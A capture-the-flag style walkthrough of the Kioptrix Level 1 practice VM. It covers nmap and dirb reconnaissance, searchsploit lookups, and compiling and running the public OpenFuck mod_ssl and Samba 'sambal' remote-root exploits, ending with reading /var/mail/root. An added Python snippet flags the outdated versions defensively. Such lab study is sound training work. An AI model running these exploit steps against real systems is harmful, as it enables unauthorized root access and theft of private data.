VulnHub Kioptrix Level 1

Name: Kioptrix: Level 1 (#1) 
Date release: 17 Feb 2010
Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

After starting the virtual machine, first use nmap to determine its IP, which turns out to be 192.168.190.129

nmap 192.168.190.0/24 -sP

Information gathering

Open services

# nmap 192.168.190.129 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-09 13:36 HKT
Nmap scan report for 192.168.190.129
Host is up (0.0037s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:CA:48:7E (VMware)

Web directories

# dirb http://192.168.190.129/
---- Scanning URL: http://192.168.190.129/ ----
+ http://192.168.190.129/~operator (CODE:403|SIZE:273)
+ http://192.168.190.129/~root (CODE:403|SIZE:269)
+ http://192.168.190.129/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.190.129/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.190.129/manual/
==> DIRECTORY: http://192.168.190.129/mrtg/
==> DIRECTORY: http://192.168.190.129/usage/

manual is the documentation for the Apache mod_ssl module

mrtg is a program called Multi Router Traffic Grapher; a Google search turns up a file-read vulnerability in its CGI scripts, but… all of the cgi files return 404

usage is a program called Webalizer; apart from exposing poweredby.png and test.php, it holds no useful information.

Searching for vulnerabilities

Looking back at the nmap results, the server also has ports 22, 111, 139 and 1024 open

Use searchsploit to look up each service and find scripts that can be used directly

# searchsploit mod_ssl 2.8
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)    |    exploits/unix/remote/47080.c

That leaves port 139. It is known to be Samba, but the version is unknown; after smbclient and smbinfo failed to retrieve it, msf successfully obtained the version number: Samba 2.2.1a

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.190.129
rhosts => 192.168.190.129
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.190.129:139   - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.190.129:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Continuing with searchsploit for Samba gives a usable script

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution    |    exploits/multiple/remote/10.c
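As an added example (not part of the original write-up), here is the defender's side of the same version-to-exploit mapping: a small Python check that parses the nmap -sV lines above and flags every service whose version falls below the first release not covered by the public exploits searchsploit reported (mod_ssl 2.8.7, Samba 2.2.8). The sample input is constructed from the scan output on this page; since nmap only reports "Samba smbd" on port 139, the Samba version is passed in from the msf smb_version result.

```python
import re

# Constructed sample input: the service lines from the nmap -sV scan in this write-up.
NMAP_OUTPUT = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""

# First releases not covered by the public exploits searchsploit listed above:
# mod_ssl < 2.8.7 and Samba < 2.2.8 are affected.
FIXED_IN = {"mod_ssl": "2.8.7", "Samba": "2.2.8"}

def parse_version(v):
    """'2.2.1a' -> ((2,''), (2,''), (1,'a')), so 2.2.1a sorts below 2.2.8."""
    parts = []
    for piece in v.split("."):
        m = re.match(r"(\d+)([a-z]*)", piece)
        if not m:
            break
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)

def is_older(found, fixed):
    return parse_version(found) < parse_version(fixed)

def find_versions(nmap_text, smb_version=None):
    """Map product -> version from the banners. nmap only reports 'Samba smbd'
    on 139 here, so the Samba version comes from the msf smb_version scan."""
    found = {}
    for line in nmap_text.splitlines():
        m = re.search(r"mod_ssl/(\d[\w.]*)", line)
        if m:
            found["mod_ssl"] = m.group(1)
        if "Samba" in line and smb_version:
            found["Samba"] = smb_version
    return found

def flag_outdated(nmap_text, smb_version=None):
    """Return [(product, found_version, fixed_in)] for each product below its fix."""
    return [(p, v, FIXED_IN[p]) for p, v in find_versions(nmap_text, smb_version).items()
            if p in FIXED_IN and is_older(v, FIXED_IN[p])]

if __name__ == "__main__":
    for product, ver, fixed in flag_outdated(NMAP_OUTPUT, smb_version="2.2.1a"):
        print(f"{product} {ver} is below {fixed}: patch or isolate this host")
```

Run against the scan above it reports both mod_ssl 2.8.4 and Samba 2.2.1a, which is exactly the pair of services the rest of this write-up goes on to exploit.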

Exploitation

Now that the version numbers and the matching exploit scripts are known, the attack can begin by using the scripts directly

Compiling the scripts

Both are .c source files, so start by compiling them

# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./
# cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./
/* Scripts usually explain how to compile and use them; 47080.c, for example, requires libssl-dev */
/* Compile the mod_ssl exploit script */
# apt update && apt install libssl-dev
# gcc -o OpenFuck 47080.c -lcrypto
/* Compile the Samba exploit script */
# gcc 10.c -o sambal

Two scripts are now ready: OpenFuck for mod_ssl and sambal for Samba

Attacking mod_ssl

# ./OpenFuck -h
Usage: ./OpenFuck target box [port] [-c N]
  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
/* From the nmap results, the target system is RedHat and the Apache version is 1.3.20, so there are two OpenFuck targets to choose from:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
*/

After trying both, only 0x6b exploits successfully

The flag hints at an email; looking under /var reveals a mail directory, and reading /var/mail/root gives the email

# ls /var
arpwatch
cache
db
ftp
lib
local
lock
log
lost+found
mail
nis
opt
preserve
run
spool
tmp
tux
www
yp
# ls /var/mail
harold
john
nfsnobody
root
# cat /var/mail/root

Attacking Samba

root@kali:~# ./sambal
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

Summary

An entry-level box. There are write-ups online that log in directly with enum4linux, but my machine here does not allow that login, and I don't know why.

Finally setting out on the OSCP learning path.
